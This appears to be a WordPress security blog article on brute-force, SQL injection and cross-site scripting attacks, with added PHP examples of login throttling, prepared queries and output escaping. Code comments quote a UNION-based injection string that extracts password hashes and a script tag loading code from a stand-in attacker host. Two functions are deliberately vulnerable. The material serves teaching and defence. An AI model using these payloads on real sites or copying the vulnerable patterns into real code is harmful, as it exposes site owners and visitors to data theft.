When it comes to our websites, we know security is a big deal. There are many ways an attacker can get into a site, so it is hard to predict exactly how any one site will be hacked. That said, most attacks follow a handful of well-worn patterns, which means we can study the most common approaches.
By knowing what attackers are most likely to try, we can harden our site against exactly those attempts. This article walks through the most common types of hacks against WordPress sites and what to do about each.
Brute Force Attack
A brute force attack is one of the most common attacks on any site. The attacker guesses your password over and over, submitting each guess to the login form, until one of them works.
Most people picture a hacker typing guesses at a keyboard, but this is no longer done by hand. The attacker runs scripts that submit thousands of guesses a minute, usually against many sites at once and often from many different IP addresses.
One form of brute force attack is the dictionary attack. Instead of trying every possible combination of characters, the script tries every word in a word list, plus common variations such as appended digits or swapped symbols. Since many of the most common passwords are single words or simple variations of them, a dictionary attack is a quick way into a site with a weak password.
How do you protect yourself?
So, how do you protect your site from a brute force attack? The first step is to make sure your passwords are strong. Check that none of them appears on a list of the most common passwords, that none of them is a dictionary word or a simple variation of one, and that all of them are long, preferably at least 12 characters. The easiest way to meet all three rules is to let a password manager generate a random, unique password for each site.
Next, make it harder for the attacker to find a username to try. Make sure there is no user with a default username such as admin, administrator, or developer. Treat this as a speed bump rather than a secret: WordPress exposes usernames in author archive URLs and, by default, through the REST API users endpoint, so the strong password and the measures below still do the real work.
Most security plugins have features in place to slow down a brute force attack. The standard method is to limit the number of failed login attempts before a temporary lockout. A weak password is usually found within the first few thousand to tens of thousands of guesses from a common-password list, and an unthrottled script can submit that many in seconds. If you allow only 3 or 5 failed attempts per account and IP address before locking out for a while, the script never gets through its list. Two caveats: attackers spread their guesses across many IP addresses, so a limit slows them down rather than stopping them outright, and a lockout keyed only on the username lets an attacker deliberately lock out your legitimate users.
Lastly, use two-factor authentication. Two-factor authentication, sometimes called “2FA”, “TFA”, or “two-step” verification, requires a second proof of identity in addition to the password before a user is logged in. The second factor is usually something you have, such as a phone app that generates one-time codes or a hardware security key.
With two-factor enabled, if a hacker were to get your username and password, it would not be enough for the hacker to get in. The hacker would need to have your second form of authentication as well.
Some security plugins have two-factor authentication as a feature. Alternatively, you can use the Two Factor Authentication plugin.
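As an added example (not code from the article, nor from any plugin it mentions), here is how the login-attempt limiting described above can be implemented as a small WordPress plugin using only core hooks. It assumes the standard WordPress APIs: the `authenticate` filter, the `wp_login_failed` and `wp_login` actions, and the transients API. The `example_` function and constant names are made up for this illustration.

```php
<?php
/**
 * Plugin Name: Example Login Throttle
 * Description: Added example for this article. Locks a client+account pair
 *              out of wp-login.php, XML-RPC and REST password logins after
 *              too many failures. Not a substitute for 2FA.
 */

define( 'EXAMPLE_LOGIN_MAX_ATTEMPTS', 5 );
define( 'EXAMPLE_LOGIN_LOCKOUT_SECONDS', 15 * MINUTE_IN_SECONDS );

// Key the counter on BOTH the client address and the account. Keying on the
// username alone would let an attacker lock legitimate users out on purpose;
// keying on the IP alone would let one IP hammer many accounts unnoticed.
function example_login_throttle_key( $username ) {
	$ip = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown';
	return 'example_login_fail_' . md5( $ip . '|' . strtolower( $username ) );
}

// Core's own username/password checks run on 'authenticate' at priority 20.
// Hooking at 30 lets us override the result: if this client+account pair is
// locked out, a WP_Error is returned even when the password was correct.
function example_login_throttle_check( $user, $username, $password ) {
	if ( empty( $username ) ) {
		return $user;
	}
	$attempts = (int) get_transient( example_login_throttle_key( $username ) );
	if ( $attempts >= EXAMPLE_LOGIN_MAX_ATTEMPTS ) {
		return new WP_Error(
			'example_too_many_attempts',
			__( 'Too many failed login attempts. Please try again later.' )
		);
	}
	return $user;
}
add_filter( 'authenticate', 'example_login_throttle_check', 30, 3 );

// Count each failure. The transient expires on its own after the lockout
// window, so no cron job or cleanup table is needed.
function example_login_throttle_record_failure( $username ) {
	$key      = example_login_throttle_key( $username );
	$attempts = (int) get_transient( $key );
	set_transient( $key, $attempts + 1, EXAMPLE_LOGIN_LOCKOUT_SECONDS );
}
add_action( 'wp_login_failed', 'example_login_throttle_record_failure' );

// Reset on success so a legitimate user's earlier typos do not linger.
function example_login_throttle_clear( $user_login ) {
	delete_transient( example_login_throttle_key( $user_login ) );
}
add_action( 'wp_login', 'example_login_throttle_clear' );
```

Drop the file into wp-content/plugins/ and activate it. Two practical notes: behind a reverse proxy or CDN, `REMOTE_ADDR` is the proxy's address, so every visitor shares one counter unless you substitute the real client address from a header that only your own proxy can set; and because the counter is per client+account, an attacker rotating through many IP addresses against one account is only slowed, which is exactly why the article also recommends two-factor authentication.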
SQL Injection
Let’s assume your site has a search form that passes whatever the visitor typed straight into a database query. A visitor types in what they want to look for, the site builds a SQL query from that text, retrieves the matching rows from the database, and displays them.
If an attacker uses that form, he or she types in words and symbols that change the meaning of the query itself. Instead of returning a list of posts, the query can be made to return the contents of other tables, such as every username and password hash in the users table. This is SQL injection.
SQL injection is when an attacker enters crafted text into an input that is inserted into a database query without proper escaping or parameterization, so that part of the input is executed as SQL. Depending on the site, an attacker could use SQL injection to retrieve usernames and password hashes, retrieve credit card numbers, alter data, or even delete data.
How do you protect yourself?
If you are the developer, follow the WordPress guidance on validating and sanitizing input and escaping output, and never build a query by concatenating user input into a SQL string. In WordPress, every query that includes a value from the request should go through `$wpdb->prepare()` with `%s`, `%d` or `%f` placeholders, so the value is treated strictly as data and never as part of the SQL.
However, most people are not developers, so the practical defence is to install only quality plugins from trusted sources and developers. Almost always, look in the WordPress Plugin Directory first. Before installing a plugin, check its reviews, its support forum, and when it was last updated for any indication that it may be abandoned or insecure.
Another essential protection is to always keep your site, plugins, and themes up to date. SQL injection vulnerabilities are regularly found in plugins and fixed in an update. If you keep running the old version, your site remains exploitable through a vulnerability that is now public.
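To make the developer advice concrete, here is an added example (not code from the article) of the search form scenario above, written as a WordPress plugin function in its vulnerable form and in its hardened form. It assumes the global `$wpdb` object with its `prepare()` and `esc_like()` methods and the core `sanitize_text_field()` and `wp_unslash()` helpers, all of which WordPress provides; the `example_` function names are made up for this illustration.

```php
<?php
// Added example for this article; not the code of any real plugin.

// VULNERABLE: the visitor's search term is concatenated straight into SQL.
// The quote in a term such as
//     %' UNION SELECT user_login, user_pass FROM wp_users -- 
// closes the LIKE string early, and the rest of the term becomes SQL that
// appends every username and password hash to the "search results".
function example_search_posts_vulnerable( $term ) {
	global $wpdb;
	$sql = "SELECT ID, post_title FROM {$wpdb->posts}
	        WHERE post_status = 'publish' AND post_title LIKE '%{$term}%'";
	return $wpdb->get_results( $sql );
}

// HARDENED: the term is bound through $wpdb->prepare(), so whatever it
// contains can only ever be the *value* of the LIKE pattern, never SQL.
// esc_like() additionally escapes the LIKE wildcards % and _ so a visitor
// cannot turn a search for "a_b" into a match-anything pattern.
function example_search_posts_safe( $term ) {
	global $wpdb;
	$pattern = '%' . $wpdb->esc_like( $term ) . '%';
	$sql     = $wpdb->prepare(
		"SELECT ID, post_title FROM {$wpdb->posts}
		 WHERE post_status = 'publish' AND post_title LIKE %s
		 LIMIT %d",
		$pattern,
		20
	);
	return $wpdb->get_results( $sql );
}

// Validation sits on top of, not instead of, the prepared statement:
// reject input that is the wrong shape, then let prepare() do the real work.
function example_handle_search_request() {
	$term = isset( $_GET['q'] ) ? sanitize_text_field( wp_unslash( $_GET['q'] ) ) : '';
	if ( '' === $term || strlen( $term ) > 100 ) {
		return array();
	}
	return example_search_posts_safe( $term );
}
```

The table and column names come from `$wpdb` rather than from the request; `prepare()` protects values, not identifiers, so a plugin that lets the visitor choose a column or table name must allow-list those separately.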
Cross Site Scripting
Cross Site Scripting, or XSS for short, is when an attacker gets his own script to run in the browsers of your site’s visitors, with all the trust your pages have. For example, if the attacker finds a way to embed his tracking script into your theme, he can track every visitor to your site.
That is a simple example of Cross Site Scripting. Another example that I have seen recently involved a site with a form where visitors could enter testimonials. The entered testimonials were then displayed across the entire website.
On that site, the hacker typed malicious code into the form, and because the site printed the testimonial without escaping it, his script was added to every page. From then on, every visitor to the website was redirected to a different website claiming that their computer was infected and that they needed to pay $99 to fix it. Because the payload is saved on the server and served to every visitor, this kind is known as stored XSS.
Another example is an XSS vulnerability found in WooCommerce in 2018. It would have allowed an attacker to inject script that could hijack a site visitor’s browser or steal sensitive information. WooCommerce fixed the issue in a patched release; as with any such fix, only sites that installed the update were protected.
How do you protect yourself?
Protecting your site from Cross Site Scripting comes down to making sure nothing a visitor submits is ever printed into a page without being escaped for the context it lands in. As a site owner you mostly enforce that by choosing your code carefully: again, install plugins and themes only from trusted sources such as wordpress.org and from developers with a track record.
As with SQL Injection, keeping your site updated is the other essential preventative measure. XSS vulnerabilities are regularly found in plugins and themes and fixed in an update; if you keep running the old version, your site stays open through that vulnerability.
Be sure to discuss these concepts with any plugin developer, theme developer, or other developer working on your site. Additionally, make sure your passwords are strong, limit login attempts, and turn on two-factor authentication.
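For the developers you talk to, here is an added example (not code from the article, and not WooCommerce’s code) of the testimonial scenario above: the unescaped output that makes stored XSS possible, beside the escaped version. It assumes the WordPress core helpers `esc_html()`, `wp_kses()`, `wp_kses_post()`, `sanitize_text_field()`, `wp_unslash()` and `update_post_meta()`; the `example_` function names, the `t_name`/`t_text` form fields and the `attacker.example` domain are made up for this illustration.

```php
<?php
// Added example for this article; not the code of any real plugin.

// VULNERABLE: the stored testimonial is printed into the page unchanged.
// A "testimonial" of
//     <script src="https://attacker.example/r.js"></script>
// is then parsed as HTML and executed by every visitor's browser on every
// page that shows testimonials, which is exactly the incident the article
// describes.
function example_render_testimonial_vulnerable( $name, $text ) {
	return "<blockquote>{$text}<footer>{$name}</footer></blockquote>";
}

// HARDENED: escape on output, for the exact HTML context each value lands in.
function example_render_testimonial_safe( $name, $text ) {
	// Plain-text slot: esc_html() turns < > & " ' into entities, so markup the
	// visitor typed is displayed literally instead of being interpreted.
	$safe_name = esc_html( $name );

	// If a little formatting must be allowed, allow-list specific tags and
	// attributes with wp_kses(). Everything else, including <script>,
	// on* event handlers and javascript: URLs, is stripped.
	$allowed_tags = array(
		'strong' => array(),
		'em'     => array(),
		'br'     => array(),
	);
	$safe_text = wp_kses( $text, $allowed_tags );

	return "<blockquote>{$safe_text}<footer>{$safe_name}</footer></blockquote>";
}

// Defence in depth: sanitize on the way in as well, but never rely on stored
// data being clean. Every template that prints the value must still escape
// it, because other code paths (imports, old records, an admin edit) may have
// written unsanitized content to the same field.
function example_store_testimonial( $post_id ) {
	$name = sanitize_text_field( wp_unslash( $_POST['t_name'] ?? '' ) );
	$text = wp_kses_post( wp_unslash( $_POST['t_text'] ?? '' ) );

	update_post_meta( $post_id, 'testimonial_name', $name );
	update_post_meta( $post_id, 'testimonial_text', $text );
}
```

The escaping function must match the destination: `esc_html()` for text between tags, `esc_attr()` for a value inside an attribute, and `esc_url()` for a link, because a value that is harmless in one context can still break out of another.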
Has your site ever been hacked? Do you know how the hackers attacked your site? Be sure to comment below about the hacks that you have encountered so that we can all learn from them.